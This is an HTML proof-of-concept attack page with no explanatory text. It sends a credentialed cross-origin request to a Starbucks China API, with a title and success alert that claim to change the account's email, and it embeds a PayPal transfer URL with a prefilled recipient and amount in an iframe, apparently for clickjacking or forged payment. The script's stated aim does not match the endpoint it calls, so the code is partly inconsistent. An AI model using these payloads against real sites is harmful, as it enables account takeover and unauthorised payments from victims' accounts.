<!DOCTYPE html>
<html>
<head>
<meta name="referrer" content="never">
<script src=/jquery-3.4.1.min.js></script>
</head>
<title>modify the emails</title>
<script>
var data = {};
data["email"] = "esperamier@hotmail.com";
$.ajax({
            url : 'https://www.starbucks.com.cn/api/stores/nearby?lat=27.111699&lon=114.986373&limit=10&locale=ZH&features=&radius=3000',
            type : 'get',
            xhrFields: {
　　　　　　       withCredentials: true
　　　　     },
            success : function(response, textStatus, jqXhr) {
                alert("Successfully Patched!Your account's email have been modified!");
            },
            error : function(jqXHR, textStatus, errorThrown) {
                // log the error to the console
                console.log("The following error occured: " + textStatus, errorThrown);
            },
            complete : function() {
                console.log("complete");
            }
        });

</script>
           <iframe src=https://www.paypal.com/myaccount/transfer/fi?env=hawk&payerId=&recipient=51981550%40qq.com&displayName=&thumbnailUrl=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2F63d3ed036ad243637885437b20e9896c%3Fs%3D150%26r%3Dg%26d%3Dblank&amount=0.09&shippingAddressId=7212045638904286790&currencyCode=USD&goods=true&action=buy&themeId=&noteToPayee=rrr&flowType=buy&paymentCardId=&conversionType=&moneyPageExperience=DEFAULT_ON_REVIEW&recipientCountry=&successfullyAddedFundingInstrumentIds=&whoPaysFee=sellerPaysFee></iframe>
</html>
